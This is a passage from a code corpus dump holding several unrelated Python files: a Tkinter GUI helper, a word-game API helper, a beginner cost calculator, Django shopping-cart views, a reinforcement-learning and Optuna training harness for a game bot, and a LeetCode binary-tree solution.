frame.pack(fill=\"y\")\n lb = Listbox(frame, selectmode=\"multiple\")\n for i in items:\n lb.insert(\"end\", i)\n lb.pack()\n self.ok_cancel_buttons(call=lambda : self.del_items(lb.curselection()))\n\n def del_items(self, selection):\n self.parent.delete_items(selection)\n self.destroy()\n\n def insert_entry_field(self, txt, default=None, focus=False):\n frame = Frame(self.frame)\n frame.pack(fill=\"x\")\n label = Label(frame, text=txt, width=6)\n label.pack(side=\"left\", anchor=\"n\", padx=5, pady=5)\n entry = Entry(frame)\n entry.pack(fill=\"x\", padx=5, pady=5, expand=True)\n if default:\n for i in default:\n entry.insert(\"end\", i)\n if focus:\n entry.focus_force()\n self.entries[\"Entry\"][txt] = entry\n\n def insert_text_field(self, txt, default=None):\n frame = Frame(self.frame)\n frame.pack(fill=\"x\")\n label = Label(frame, text=txt, width=6)\n label.pack(side=\"left\", anchor=\"n\", padx=5, pady=5)\n entry = Text(frame)\n entry.pack(fill=\"both\", pady=5, padx=5, expand=True)\n if default:\n for i in default:\n entry.insert(\"end\", i)\n self.entries[\"Text\"][txt] = entry\n\nclass Text2(Frame):\n def __init__(self, master, width=0, height=0, sid=None, **kwargs):\n Frame.__init__(self, master, width=width, height=height)\n self.master = master\n self.width = width\n self.height = height\n self.sid = sid\n self.text_widget = Text(self, **kwargs)\n self.text_widget.pack(expand=True, fill=\"both\")\n\n def insert(self, *args, **kwargs):\n self.text_widget.insert(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n self.text_widget.delete(*args, **kwargs)\n\n def config(self, *args, **kwargs):\n self.text_widget.config(*args, **kwargs)\n\n def get(self, *args, **kwargs):\n return self.text_widget.get(*args, **kwargs)\n\n def bind(self, *args, **kwargs):\n self.text_widget.bind(*args, **kwargs)\n\n def bindtags(self, *args, **kwargs):\n self.text_widget.bind(*args, **kwargs)\n\n def pack(self, *args, **kwargs):\n Frame.pack(self, *args, **kwargs)\n self.pack_propagate(False)\n\n def grid(self, *args, **kwargs):\n Frame.grid(self, *args, **kwargs)\n self.grid_propagate(False)\n","repo_name":"Exodus111/Projects","sub_path":"Games/Tools/Writing-Tool/mod_items.py","file_name":"mod_items.py","file_ext":"py","file_size_in_byte":10642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28147298103","text":"from config import *\r\n\r\n\r\ndef get_wordarray(input):\r\n params = {'string': input, 'language': language}\r\n response = requests.get(request_path, params,\r\n headers={'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})\r\n # convert text response to json array\r\n json_array = json.loads(response.text[2:])\r\n print(\"Guess array: \", json_array['data'])\r\n guess_array = json_array['data']\r\n return guess_array\r\n\r\n\r\ndef get_basearray(guess):\r\n params = {'string': guess, 'language': \"Telugu\"}\r\n response_basechars = requests.get(request_basecharpath, params,\r\n headers={\r\n 'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})\r\n\r\n # convert text response to json array\r\n json_guessbasechararray = json.loads(response_basechars.text[2:])\r\n print(json_guessbasechararray)\r\n print(\"json_guessbasechararray['data']: \", json_guessbasechararray['data'])\r\n base_array = json_guessbasechararray['data']\r\n print(\"guess base array length: \", len(base_array))\r\n return base_array\r\n\r\n# validate user custom input\r\ndef custom_input_check(input):\r\n # flag = True\r\n global guess_array\r\n global word_length\r\n\r\n guess_array = get_wordarray(input)\r\n session['guess_array'] = guess_array\r\n word_length = len(guess_array)\r\n print(\"Word length: \", word_length)\r\n print(\"Guess array length: \", len(guess_array))\r\n\r\n flag = check_for_duplicate_letters(guess_array)\r\n\r\n return flag\r\n\r\n\r\ndef check_for_duplicate_letters(guess_array):\r\n flag = True\r\n for char in guess_array:\r\n print(\"character count: \", char, guess_array.count(char))\r\n if guess_array.count(char) > 1:\r\n flag = False\r\n\r\n return flag\r\n","repo_name":"sjasthi/animals_python","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18628585217","text":"COST=input(\"please tell me your cost(RMB) : \")\nCOSTE=float(COST)\nTTC=COSTE*115/100\nTTCE=str(TTC)\nprint(\"so yoou need to pay me\",TTCE,\"RMB\")\nPAY=input(\"so,you are going to pay(RMB) : \")\nPAYE=float(PAY)\nCHANGE=PAYE-TTCE\nCHANGEE=float(CHANGE)\nprint(\"here is your change,\",CHANGEE,\"RMB\")\n","repo_name":"EEExphon/Basic_Codes_for_Python","sub_path":"INT FLOAT/Cost And Change.py","file_name":"Cost And Change.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74230572354","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom cart.models import *\nfrom .serializers import *\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef add_product(request):\n \"\"\" Response element to js script + \"\"\"\n\n if request.method == 'POST':\n body = request.data\n product = Product.objects.get(pk=body['id'])\n serializer = ProductSerializer(product)\n\n request.session['cart'][body['id']] = serializer.data\n request.session.save()\n print(request.session['cart'])\n return Response(serializer.data)\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef delete_product(request):\n \"\"\" Response element to js script for deleting \"\"\"\n\n if request.method == 'POST':\n\n body = request.data\n del request.session['cart'][body['id']]\n request.session.save()\n\n return Response()\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef clear_cart(request):\n \"\"\" Response element to js script for deleting + \"\"\"\n\n if request.method == 'POST':\n request.session['cart'] = {}\n\n return Response()\n\n\n@api_view(['GET'])\ndef update_session(request):\n \"\"\" Update cart. + \"\"\"\n if request.method == 'GET':\n\n session_key = request.session.session_key\n if 'cart' not in request.session:\n request.session['cart'] = {}\n if not session_key:\n request.session.cycle_key()\n\n\n else:\n\n active_goods = []\n for Value in request.session['cart']:\n active_goods.append(request.session['cart'][Value])\n\n return Response(active_goods)\n\n\n@api_view(['POST'])\ndef complete_cart(request):\n \"\"\" add cart. + \"\"\"\n if request.method == 'POST':\n\n new_order = Order.objects.create(customer_name='Alex', is_active=True, stage=StageGeneration.base)\n for value in request.session['cart']:\n ProductInOrder.objects.create(order=new_order, product=Product.objects.get(id=value))\n request.session['cart'] = {}\n return Response()\n","repo_name":"LexaVopper/MiniShop","sub_path":"Shop/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1653818910","text":"import pathlib\nimport pickle\nimport sys\nimport queue\nimport threading\nfrom typing import Any, Callable, Dict, List, NamedTuple, Tuple, Union, Optional, Type\n\nimport torch\nimport torch.nn as nn\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sb3_contrib import QRDQN\nfrom stable_baselines3 import DQN, PPO\nfrom stable_baselines3.dqn.policies import QNetwork, DQNPolicy\nfrom stable_baselines3.common.callbacks import BaseCallback, CheckpointCallback, EveryNTimesteps\nfrom stable_baselines3.common.logger import TensorBoardOutputFormat\n\nfrom plot import moving_average\n\n\nGymObs = Union[Tuple, Dict, np.ndarray, int]\n\n\nenv_queue = queue.Queue() # Input observation\naction_queue = queue.Queue() # Output action\n\nN_EXTRA_FEATURES = 1 + 2\nINPUT_SIZE = 6*2 + 1 + 3 + 6 + 1 + 1 + N_EXTRA_FEATURES\nOUT_SIZE = 3\n\nKYS_FLAG = \"kys\"\nGAME_OVER_FLAG = \"game_over\"\nENV_STATE_FLAG = \"env_state\"\n\n\ndef latest_checkpoint(path):\n path = pathlib.Path(path)\n checkpoints = list(path.glob(\"*_steps.zip\"))\n if len(checkpoints) > 0:\n n, p = max([(int(p.stem.rsplit('_')[2]), p) for p in checkpoints])\n replay_buffers = list(path.glob(f\"*_replay_buffer_{n}_steps.pkl\"))\n if len(replay_buffers) > 0:\n return p, replay_buffers[0]\n return p, None\n return None\n\n\ndef get_env_queue():\n flag, value = env_queue.get()\n if flag == KYS_FLAG:\n return sys.exit() # Exit the learner thread only\n return flag, value\n\n\ndef create_dropout_mlp(\n input_dim: int,\n output_dim: int,\n net_arch: List[int],\n dropout_arch: List[float],\n activation_fn: Type[nn.Module] = nn.ReLU,\n squash_output: bool = False,\n) -> List[nn.Module]:\n if len(net_arch) > 0:\n modules = [nn.Linear(input_dim, net_arch[0]), activation_fn(), nn.Dropout(dropout_arch[0])]\n else:\n modules = []\n\n for idx in range(len(net_arch) - 1):\n modules.append(nn.Linear(net_arch[idx], net_arch[idx + 1]))\n modules.append(activation_fn())\n modules.append(nn.Dropout(dropout_arch[idx + 1]))\n\n if output_dim > 0:\n last_layer_dim = net_arch[-1] if len(net_arch) > 0 else input_dim\n modules.append(nn.Linear(last_layer_dim, output_dim))\n if squash_output:\n modules.append(nn.Tanh())\n return modules\n\nclass CustomQNetwork(QNetwork):\n def __init__(\n self,\n observation_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n features_extractor: nn.Module,\n features_dim: int,\n net_arch: Optional[List[int]] = None,\n activation_fn: Type[nn.Module] = nn.ReLU,\n normalize_images: bool = True,\n ):\n super().__init__(observation_space, action_space, features_extractor, features_dim, \n net_arch=net_arch, activation_fn=activation_fn, normalize_images=normalize_images)\n\n dropout_arch = [0.097, 0.11]\n q_net = create_dropout_mlp(self.features_dim, self.action_space.n, [115, 97], dropout_arch, nn.ReLU)\n # q_net = create_dropout_mlp(self.features_dim, self.action_space.n, self.net_arch, dropout_arch, self.activation_fn)\n self.q_net = nn.Sequential(*q_net)\n self.q_net.load_state_dict(torch.load(\"pretrained.pth\"))\n\nclass CustomDQNPolicy(DQNPolicy):\n def make_q_net(self):\n # Make sure we always have separate networks for features extractors etc\n net_args = self._update_features_extractor(self.net_args, features_extractor=None)\n return CustomQNetwork(**net_args).to(self.device)\n\n\nclass SupaEnv(gym.Env):\n # TODO use rl_zoo3 frame skipping wrapper\n def __init__(self, hparams: dict = None):\n super(SupaEnv, self).__init__()\n self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(INPUT_SIZE,))\n self.action_space = gym.spaces.Discrete(OUT_SIZE)\n\n self.last_state = None \n self.real_episode_scores = []\n self.hparams = {\n \"reward_slot_center\": False, # Receive reward for being close to the center of a slot\n \"reward_slot_center_amount\": 0,\n \"reward_far_wall\": True, # Receive reward for being on a slot where the wall is far away\n \"reward_far_wall_amount\": 0.8255774334211466,\n \"reward_interval\": 60, # Receive interval_reward reward after this many successful steps\n \"interval_reward\": 0,\n \"default_reward\": 0, # Receive reward each step\n \"loss_reward\": -1, # Reward when game over\n }\n if hparams:\n self.hparams.update(hparams)\n for attr, value in self.hparams.items():\n setattr(self, attr, value)\n self.frame_number = 0\n\n def reset(self) -> GymObs:\n \"\"\"\n Called at the beginning of an episode.\n :return: the first observation of the episode\n \"\"\"\n flag, state = get_env_queue()\n state_struct = self.state_to_struct(state)\n state_struct = self.add_state_features(state_struct)\n state = state_struct[\"_packed\"]\n self.last_state = state\n self.frame_number = 1\n return state\n\n def step(self, action: Union[int, np.ndarray]) -> Tuple[GymObs, float, bool, Dict]:\n \"\"\"\n Step into the environment.\n :return: A tuple containing the new observation, the reward signal, \n whether the episode is over and additional informations.\n \"\"\"\n action_queue.put(action)\n flag, state = get_env_queue()\n if flag == GAME_OVER_FLAG:\n self.real_episode_scores.append(state)\n state = self.last_state\n reward = self.loss_reward\n done = True\n elif flag == ENV_STATE_FLAG:\n state_struct = self.state_to_struct(state)\n state_struct = self.add_state_features(state_struct)\n state = state_struct[\"_packed\"]\n self.last_state = state\n self.frame_number += 1\n reward = self.get_reward(state_struct)\n done = False\n else:\n raise ValueError(f\"Unknown flag {flag}\")\n info = {}\n return state, reward, done, info\n\n def get_reward(self, state_struct: dict) -> float:\n reward = self.default_reward\n # Reward shaping\n if self.frame_number % self.reward_interval == 0:\n reward += self.interval_reward\n if self.reward_slot_center:\n reward += self.reward_slot_center_amount * pow(1 - abs(state_struct[\"center_offset\"]), 4)\n if self.reward_far_wall:\n wall_dist, wall_width = self.get_cur_wall_dist(state_struct)\n reward += self.reward_far_wall_amount * wall_dist\n return reward\n\n @staticmethod\n def add_state_features(state_struct: dict) -> dict:\n # Add extra features to the input\n center_offset = SupaEnv.get_cur_center_offset(state_struct)\n state_struct[\"center_offset\"] = center_offset\n state_struct[\"_packed\"].append(center_offset)\n phi = state_struct[\"player_pos\"] / state_struct[\"n_slots\"] * 2 * np.pi\n state_struct[\"pos_x\"] = np.cos(phi)\n state_struct[\"pos_y\"] = np.sin(phi)\n state_struct[\"_packed\"].append(state_struct[\"pos_x\"])\n state_struct[\"_packed\"].append(state_struct[\"pos_y\"])\n return state_struct\n\n @staticmethod\n def state_to_struct(state: list) -> dict:\n # This function must be defined based on the C++ GameState_DQN struct.\n walls = np.array(state[:12]).reshape(6, 2)\n wall_speed = state[12]\n n_slots = state[13:16].index(1) + 4\n cur_slot = next(i for i, x in enumerate(state[16:16+6]) if x > 0)\n return {\n \"_packed\": state,\n \"walls\": walls,\n \"wall_speed\": wall_speed,\n \"n_slots\": n_slots,\n \"cur_slot\": cur_slot,\n \"player_pos\": state[22] * n_slots,\n \"world_rotation\": state[23],\n }\n\n @staticmethod\n def get_cur_wall_dist(state_struct: dict) -> tuple:\n dist, width = state_struct[\"walls\"][state_struct[\"cur_slot\"]]\n return dist, width\n\n @staticmethod\n def get_cur_center_offset(state_struct: dict) -> float:\n # -1: left edge, 0: center, 1: right edge\n pos = state_struct[\"player_pos\"] * state_struct[\"n_slots\"] \n return (pos % 1.0) * 2.0 - 1.0\n\n\n# Adapted from https://github.com/DLR-RM/rl-baselines3-zoo/blob/master/rl_zoo3/wrappers.py\nclass HistoryWrapper(gym.Wrapper):\n \"\"\"\n Stack past observations and actions to give an history to the agent.\n :param env:\n :param horizon:Number of steps to keep in the history.\n \"\"\"\n\n def __init__(self, env: gym.Env, horizon: int = 2):\n horizon = env.hparams.get(\"horizon\", horizon)\n \n # Overwrite the observation space\n input_size = INPUT_SIZE + (INPUT_SIZE + 1) * horizon\n env.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf, shape=(input_size,))\n \n super().__init__(env)\n\n self.horizon = horizon\n self.obs_history = np.zeros(INPUT_SIZE * (horizon + 1))\n self.action_history = np.zeros(horizon)\n\n def _create_obs_from_history(self):\n return np.concatenate((self.obs_history, self.action_history))\n\n def reset(self):\n # Flush the history\n self.obs_history[...] = 0\n self.action_history[...] = 0\n obs = self.env.reset()\n obs = np.array(obs)\n self.obs_history[..., -obs.shape[-1] :] = obs\n return self._create_obs_from_history()\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n obs = np.array(obs)\n action = np.array(action)\n last_ax_size = obs.shape[-1]\n\n self.obs_history = np.roll(self.obs_history, shift=-last_ax_size, axis=-1)\n self.obs_history[..., -obs.shape[-1] :] = obs\n\n self.action_history = np.roll(self.action_history, shift=-1, axis=-1)\n self.action_history[..., -1:] = action\n return self._create_obs_from_history(), reward, done, info\n\n\nclass TensorboardCallback(BaseCallback):\n def _on_training_start(self):\n # Save reference to tensorboard formatter object\n output_formats = self.logger.output_formats\n self.tb_formatter = next(formatter for formatter in output_formats if isinstance(formatter, TensorBoardOutputFormat))\n\n # TODO https://stable-baselines3.readthedocs.io/en/master/guide/tensorboard.html#logging-hyperparameters\n env_params = self.training_env.get_attr(\"hparams\")[0]\n model_params = self.model._hparams\n self.tb_formatter.writer.add_text(\"params/model\", str(model_params), self.num_timesteps)\n self.tb_formatter.writer.add_text(\"params/env\", str(env_params), self.num_timesteps)\n\n def _on_step(self) -> bool:\n is_episode_done = self.locals[\"dones\"][0]\n if is_episode_done:\n scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n self.tb_formatter.writer.add_scalar(\"Score/Score vs episode\", scores[-1], len(scores))\n self.tb_formatter.writer.add_scalar(\"Score/Time vs episode\", scores[-1] / 60, len(scores))\n self.logger.record(\"Score/Score vs steps\", scores[-1])\n return True\n\n\nclass SavePlotCallback(BaseCallback):\n def __init__(self, save_path: str, verbose: int = 0):\n super().__init__(verbose)\n self.save_path = pathlib.Path(save_path)\n\n def _on_training_start(self):\n self.save_path.mkdir(parents=True, exist_ok=True)\n\n def _on_step(self) -> bool:\n def plot(ax, data):\n ax.set_title(\"Q-learning score history\")\n x = np.array(data) / 60 # Seconds\n ax.set_ylabel('Time [s]')\n ax.set_xlabel('Attempt number')\n ax.plot(x)\n ax.plot(moving_average(x, k=10))\n\n score_history = self.training_env.get_attr(\"real_episode_scores\")[0]\n path = self.save_path / f\"{self.num_timesteps}.png\"\n fig, ax = plt.subplots()\n plot(ax, score_history)\n fig.savefig(path)\n plt.close(fig)\n return True\n\n\nclass CheckpointWithEnvCallback(CheckpointCallback):\n def _on_step(self) -> bool:\n # Save env variables by adding them as model variables so they get saved\n real_episode_scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n hparams = self.training_env.get_attr(\"hparams\")[0]\n self.model._env_real_episode_scores = real_episode_scores\n self.model._env_hparams = hparams\n return super()._on_step()\n\n\nclass SupaSB3:\n def __init__(self, experiment_name=\"sb3_21\"):\n self.experiment_name = experiment_name\n \n self.model_class = QRDQN # DQN, PPO\n\n sb3_params = dict(\n train_freq=8,\n gradient_steps=-1,\n gamma=0.99,\n exploration_fraction=0,\n exploration_final_eps=0,\n target_update_interval=1000,\n learning_starts=10000,\n buffer_size=100_000,\n batch_size=128,\n learning_rate=6.516183998165423e-05,\n policy_kwargs=dict(net_arch=[256, 256])\n )\n # PPO\n # sb3_params = dict(\n # n_steps = 1024,\n # batch_size = 64,\n # gae_lambda = 0.98,\n # gamma = 0.95,\n # n_epochs = 4,\n # ent_coef = 0.01,\n # )\n\n self.total_timesteps = 2_000_000\n self.horizon = 2 # Stack this many states into one\n\n # The model works with indices [0, 3), but the server expects [-1,0,1].\n self.actions_tr = [-1, 0, 1] # Map action index to action\n self.actions_tr_inv = { v: i for i, v in enumerate(self.actions_tr) }\n\n checkpoint_path = f\"./checkpoints/{self.experiment_name}\"\n checkpoint_callback = CheckpointWithEnvCallback(\n save_freq=50_000, # steps\n save_path=checkpoint_path,\n name_prefix=self.experiment_name,\n save_replay_buffer=True,\n save_vecnormalize=True,\n verbose=2\n )\n save_plot_callback_ = SavePlotCallback(save_path=checkpoint_path)\n save_plot_callback = EveryNTimesteps(n_steps=checkpoint_callback.save_freq, callback=save_plot_callback_)\n\n self.callbacks = [\n TensorboardCallback(),\n checkpoint_callback,\n save_plot_callback\n ]\n\n env = SupaEnv()\n self.env = HistoryWrapper(env, horizon=self.horizon)\n if not self.load_checkpoint(checkpoint_path):\n self.model = self.model_class(\n \"MlpPolicy\", # CustomDQNPolicy\n self.env,\n **sb3_params,\n verbose=2,\n tensorboard_log=f\"runs/{self.experiment_name}\",\n seed=42)\n self.model._hparams = sb3_params # Store params for easy logging and saving\n self.learn_thread = None \n\n self.last_action = None\n\n def on_episode_end(self, score=None):\n if self.learn_thread and self.learn_thread.is_alive():\n env_queue.put((GAME_OVER_FLAG, score))\n self.last_action = None\n\n def get_action(self, state):\n action = None\n env_queue.put((ENV_STATE_FLAG, state))\n if self.learn_thread and self.learn_thread.is_alive():\n try:\n action = action_queue.get(timeout=15)\n except queue.Empty:\n # This should happen only when the total timesteps is reached (learning has stopped)\n print(\"action_queue timeout\") \n if action is None: # When not learning \n if self.last_action is None:\n state = self.env.reset()\n else:\n state, *_ = self.env.step(self.last_action)\n action_queue.get() # Empty out the queue (== self.last_action)\n action, _ = self.model.predict(state, deterministic=True)\n \n self.last_action = action\n action = self.actions_tr[action]\n return action\n\n def set_is_learning(self, is_learning):\n def learn_worker():\n self.model.learn(\n total_timesteps=self.total_timesteps - self.model.num_timesteps, \n log_interval=10, # Log every n episodes \n reset_num_timesteps=False, \n callback=self.callbacks)\n print(\"Learning complete!\")\n\n if is_learning:\n if self.learn_thread is None or not self.learn_thread.is_alive():\n self.learn_thread = threading.Thread(target=learn_worker)\n self.learn_thread.start()\n else:\n if self.learn_thread:\n if self.learn_thread.is_alive():\n env_queue.put((KYS_FLAG, None))\n self.learn_thread.join()\n self.learn_thread = None\n\n def load_checkpoint(self, checkpoint_path):\n # Resume latest checkpoint\n path = latest_checkpoint(checkpoint_path)\n if path is None:\n return False\n\n model_path, replay_buffer_path = path\n self.model = self.model_class.load(model_path, env=self.env, print_system_info=True)\n if replay_buffer_path:\n self.model.load_replay_buffer(replay_buffer_path)\n\n # Restore manually saved env variables\n self.env.env.real_episode_scores = self.model._env_real_episode_scores\n self.env.env.hparams = self.model._env_hparams\n self.model.set_env(self.env)\n\n return True \n\n\n\nimport optuna\nimport optuna.visualization as opt_vis\n\n\nclass OptunaTrialCallback(BaseCallback):\n def __init__(self, trial: optuna.Trial, eval_freq: int, verbose: int = 0):\n super().__init__(verbose)\n\n self.eval_freq = eval_freq\n self.trial = trial\n self.last_n_mean = 50\n \n self.is_pruned = False\n\n def _on_step(self) -> bool:\n # if self.num_timesteps > 40_000:\n # # Prune if the run is absolute garbage (worse than random)\n # scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n # score = np.median(scores[-min(len(scores), self.last_n_mean):])\n # if score < 3 * 60:\n # self.is_pruned = True\n # return False\n if self.num_timesteps % self.eval_freq == 0:\n scores = self.training_env.get_attr(\"real_episode_scores\")[0]\n score = np.median(scores[-min(len(scores), self.last_n_mean):])\n self.trial.report(score, self.num_timesteps)\n if self.trial.should_prune():\n self.is_pruned = True\n return False\n return True\n\n\ndef sample_dqn_params(trial: optuna.Trial) -> Dict[str, Any]:\n gamma = trial.suggest_categorical(\"gamma\", [0.9, 0.95, 0.97, 0.99])\n learning_rate = trial.suggest_float(\"learning_rate\", 1e-5, 1, log=True)\n # batch_size = trial.suggest_categorical(\"batch_size\", [16, 32, 64, 128, 256, 512])\n batch_size = 128\n # buffer_size = trial.suggest_categorical(\"buffer_size\", [int(1e4), int(5e4), int(1e5)])\n buffer_size = 100_000\n\n exploration_fraction = 0\n exploration_final_eps = 0\n\n # exploration_final_eps = trial.suggest_float(\"exploration_final_eps\", 0, 0.1)\n # exploration_fraction = trial.suggest_float(\"exploration_fraction\", 0, 0.5)\n target_update_interval = trial.suggest_categorical(\"target_update_interval\", [300, 1000, 5000, 10000])\n\n # train_freq = trial.suggest_categorical(\"train_freq\", [1, 8, 16])\n # subsample_steps = trial.suggest_categorical(\"subsample_steps\", [1, 2])\n # gradient_steps = max(train_freq // subsample_steps, 1)\n train_freq = 8\n gradient_steps = -1\n\n # net_arch = trial.suggest_categorical(\"net_arch\", [\"tiny\", \"small\", \"medium\"])\n net_arch = \"medium\"\n net_arch = {\"tiny\": [64], \"small\": [64, 64], \"medium\": [256, 256]}[net_arch]\n\n hyperparams = {\n \"gamma\": gamma,\n \"learning_rate\": learning_rate,\n \"batch_size\": batch_size,\n \"buffer_size\": buffer_size,\n \"train_freq\": train_freq,\n \"gradient_steps\": gradient_steps,\n \"exploration_fraction\": exploration_fraction,\n \"exploration_final_eps\": exploration_final_eps,\n \"target_update_interval\": target_update_interval,\n \"learning_starts\": 5000,\n \"policy_kwargs\": dict(net_arch=net_arch),\n }\n return hyperparams\n\n\ndef sample_env_params(trial: optuna.Trial) -> Dict[str, Any]:\n reward_slot_center_amount = 0 # trial.suggest_float(\"reward_slot_center_amount\", 0, 1)\n reward_far_wall_amount = trial.suggest_float(\"reward_far_wall_amount\", 0, 1)\n # default_reward = trial.suggest_float(\"default_reward\", 0, 1)\n default_reward = 0.0\n # horizon = trial.suggest_categorical(\"horizon\", [0, 1, 2])\n horizon = 2\n\n hyperparams = {\n \"reward_slot_center\": False, # Receive reward for being close to the center of a slot\n \"reward_slot_center_amount\": reward_slot_center_amount,\n \"reward_far_wall\": True, # Receive reward for being on a slot where the wall is far away\n \"reward_far_wall_amount\": reward_far_wall_amount,\n \"reward_interval\": 60, # Receive interval_reward reward after this many successful steps\n \"interval_reward\": 0,\n \"default_reward\": default_reward, # Receive reward each step\n \"loss_reward\": -1, # Reward when game over\n \"horizon\": horizon, # Stack this many previous states together\n }\n return hyperparams\n\n\nclass SupaSB3Optuna:\n def __init__(self, experiment_name=\"optuna_qrdqn_1\"):\n self.experiment_name = experiment_name\n\n self.n_trials = 50\n self.n_startup_trials = 3 # Pruning is disabled until the given number of trials finish in the same study.\n self.eval_freq = 2000 # Report metrics to pruner every this many steps\n self.total_timesteps = 50_000\n self.n_warmup_steps = int(self.total_timesteps * 0.3) # Do not prune before % of the max budget is used\n\n # The model works with indices [0, 3), but the server expects [-1,0,1].\n self.actions_tr = [-1, 0, 1] # Map action index to action\n self.actions_tr_inv = { v: i for i, v in enumerate(self.actions_tr) }\n\n # A seperate thread is used for listening to C++ requests and for optimization.\n # Another option would be to make the gym.Env handle server requests instead.\n self.learn_thread = threading.Thread(target=self.optimize_hyperparameters)\n self.learn_thread.start()\n\n def on_episode_end(self, score=None):\n env_queue.put((GAME_OVER_FLAG, score))\n\n def get_action(self, state):\n env_queue.put((ENV_STATE_FLAG, state))\n try:\n action = action_queue.get(timeout=10)\n except queue.Empty:\n while not env_queue.empty():\n env_queue.get_nowait()\n env_queue.put((ENV_STATE_FLAG, state))\n action = action_queue.get()\n action = self.actions_tr[action]\n return action\n\n def set_is_learning(self, is_learning):\n return\n\n def optimize_hyperparameters(self):\n print(\"Optimizing hyperparameters...\")\n\n def objective(trial: optuna.Trial): \n print(f\"Running trial {trial._trial_id} ...\")\n\n env_params = sample_env_params(trial)\n dqn_params = sample_dqn_params(trial)\n print(env_params)\n print(dqn_params)\n\n env = SupaEnv(hparams=env_params)\n env = HistoryWrapper(env)\n\n model = QRDQN(\n \"MlpPolicy\",\n env,\n **dqn_params,\n verbose=2,\n # tensorboard_log=None,\n tensorboard_log=f\"runs/{self.experiment_name}/{trial._trial_id}\",\n seed=None)\n model._hparams = dqn_params # Store params for easy logging and saving\n\n trial_cb = OptunaTrialCallback(trial, eval_freq=self.eval_freq, verbose=2)\n callbacks = [\n TensorboardCallback(),\n trial_cb\n ]\n model.learn(\n total_timesteps=self.total_timesteps, \n log_interval=10, # Log every n episodes \n reset_num_timesteps=False, \n callback=callbacks)\n print(\"Learning complete!\")\n\n model.save(f\"runs/{self.experiment_name}/{trial._trial_id}/model\")\n \n if trial_cb.is_pruned:\n print(f\"Pruning trial {trial._trial_id}\")\n raise optuna.exceptions.TrialPruned()\n\n scores = env.env.real_episode_scores\n score = np.mean(scores[-min(len(scores), trial_cb.last_n_mean):])\n return score\n\n sampler = optuna.samplers.TPESampler(n_startup_trials=self.n_startup_trials)\n pruner = optuna.pruners.MedianPruner(n_startup_trials=self.n_startup_trials, n_warmup_steps=self.n_warmup_steps)\n\n storage_path = f\"runs/{self.experiment_name}/{self.experiment_name}.db\"\n storage_name = f\"sqlite:///{storage_path}\"\n pathlib.Path(storage_path).parent.mkdir(exist_ok=True, parents=True)\n study = optuna.create_study(sampler=sampler, pruner=pruner, direction=\"maximize\", study_name=self.experiment_name, storage=storage_name, load_if_exists=True)\n\n # Start with a good initial guess\n study.enqueue_trial({\n \"gamma\": 0.97,\n 'learning_rate': 0.0008195333347828384,\n 'target_update_interval': 300,\n 'reward_far_wall_amount': 0.656756348802928\n })\n study.optimize(objective, n_trials=self.n_trials)\n\n pruned_trials = study.get_trials(deepcopy=False, states=[optuna.trial.TrialState.PRUNED])\n complete_trials = study.get_trials(deepcopy=False, states=[optuna.trial.TrialState.COMPLETE])\n\n print(\"Study statistics: \")\n print(\" Number of finished trials: \", len(study.trials))\n print(\" Number of pruned trials: \", len(pruned_trials))\n print(\" Number of complete trials: \", len(complete_trials))\n\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(\" Value: \", trial.value)\n\n print(\" Params: \")\n for key, value in trial.params.items():\n print(\" {}: {}\".format(key, value))\n\n log_path = f\"runs/{self.experiment_name}/report\"\n print(f\"Writing report to {log_path}\")\n study.trials_dataframe().to_csv(f\"{log_path}.csv\")\n\n # Save python object to inspect/re-use it later\n with open(f\"{log_path}.pkl\", \"wb+\") as f:\n pickle.dump(study, f)\n\n # Plot optimization result\n try:\n fig1 = opt_vis.plot_optimization_history(study)\n fig2 = opt_vis.plot_param_importances(study)\n fig3 = opt_vis.plot_intermediate_values(study)\n fig4 = opt_vis.plot_parallel_coordinate(study)\n\n fig1.show()\n fig2.show()\n fig3.show()\n fig4.show()\n except (ValueError, ImportError, RuntimeError):\n pass\n\n print(\"Done optimizing hyperparameters!\")\n ","repo_name":"mare5x/SuperHaxagon","sub_path":"py/sb3_rl.py","file_name":"sb3_rl.py","file_ext":"py","file_size_in_byte":27041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71475619074","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isSubtree(self, root: Optional[TreeNode], subRoot: Optional[TreeNode]) -> bool:\n if root == None:\n return False\n check = self.isSameTree(root, subRoot)\n if check == True:\n return True\n left_sub = self.isSubtree(root.left, subRoot)\n right_sub = self.isSubtree(root.right, subRoot)\n return left_sub or right_sub\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n if p == None or q==None:\n if p == q:\n return True\n else:\n return False\n if p.val == q.val:\n left_check = self.isSameTree(p.left, q.left)\n right_check = self.isSameTree(p.right, q.right)\n return left_check and right_check\n else:\n return False\n","repo_name":"KevinFan9729/coding-refresher","sub_path":"Subtree of Another 